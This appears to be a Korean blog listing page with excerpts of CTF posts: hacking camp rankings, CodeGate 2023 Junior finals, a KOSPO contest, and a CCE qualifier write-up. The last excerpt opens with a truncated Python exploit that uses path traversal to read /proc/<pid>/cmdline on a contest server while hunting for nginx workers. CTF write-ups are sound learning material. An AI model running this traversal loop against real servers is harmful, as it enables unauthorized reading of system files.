One_Blog

이번에도 해킹캠프를 다녀왔다. 이번에 벌써 3회째인데, 어째 한번도 1등을 못하고 있다.. 물론 순위는 9위 -> 8위 -> 4위로 점점 올라가고 있긴한데, 아쉬운 건 어쩔 수 없다.. 이번에 BestHacker는 안수현님(mov_ptr)이셨는데, 생각보다 베스트 해커 상품이 진짜 개쩔었다. 에어팟 프로 + POC 컨퍼런스 참가권(80만원 이상) + 블랙햇 굿즈 + 티오리 관련 굿즈 + Etc ... 생각보다 너무 좋아서 부럽긴 했지만, mov_ptr님이 워낙에 참여도가 좋으셨기에 베스트해커로 인정할 수 밖에 없었다. (우리팀이셧음 ^^) 그리고 뭔가 저저번 해킹캠프부터 문제 난이도가 계속 올라가는 것 같다. 지지난번 해킹캠프 때는 시스템 해킹을 공부하던 쌩초보여서 난이도가 잘 기억 안나긴하는데, 라이트..

이번에 코드게이트 본선에 Junior CTF Player로 진출을 했다. 무려 44개국에서 300명 이상의 해커가 참여한 CodeGate 2023 Junior 파트.. 사실 예선 때 26위를 해서 올해 본선은 글렀다고 생각했다. 그런데 코드게이트 본선 일주일전, 메일이 하나 도착했다. 아침에 컴퓨터 켜서 메일창 보는 게 습관인 나 인데, 이걸 보자마자 아침부터 기분이 너무 좋아졌다. 바로 참가의사를 밝히고, 관련 서류 작성 후 본선 진출이 확정나게 되었다. 너무 너무 신이났고, 바로 코드게이트 준비를 위해 안 끝낸 드림핵 로드맵 + 워게임을 풀기 시작했고, 지난 주 목요일, 코드게이트 본선에서 19위를 기록하고 왔다. 19위면 좀 낮은 순위라 할 수도 있긴 한데, 애초에 26위였던 내가 19위까지 올라간..

문제 .. 를 보고 직접 분석도 하고, 스샷도 찍고 할려고 했는데 .. 문제 인스턴스가 대회 끝나고 다 내려가 버렸다. 어쩔 수 없이 기억에 의존할 수 밖에 없다 ㅠㅠ 우선 KOSPO 대회의 경우, 이번엔 오전 10시부터 오후 18시까지 대회가 진행 되었다. 시간도 CCE마냥 엄청 조금 주는데, 심지어 라이트업까지 쓰게 시켰다.. 처음엔 엄청 시간이 촉박하다 라고 생각했는데, 풀면서 문제 난이도를 보니, 이렇게 시킬만 하다고 생각되었다. Rev, Pwn 등의 난이도는 안풀어봐서 잘 모르겠지만, Web은 일단 무난하게 쉬운 편이었다. 그럼에도 웹 하나를 못풀었는데 ... 그 이유는 나중에 설명하겠다. KOSPO의 경우, Web, Pwn, Rev, For와 같이 굉장히 다양한 분야의 문제가 출제되었는데, 특..

CCE.. 예선이 5월인가 그랬는데 중간에 행사가 너무 많아서 이제야 올리게됐다. 사이트도 다 닫히고 이미 할 게 없는 수준이지만 그냥 심심해서 올려본다. import sys,threading, requests URL = f'http://20.196.197.149:8000/' cpus = 0 pid_max = 4194304 nginx_workers = [] for pid in range(pid_max): r = requests.get(URL, params={ 'page': f'../../../../../../proc/{pid}/cmdline' }) if b'nginx: worker process' in r.content: print(f'[*] nginx worker found: {pid}') nginx_..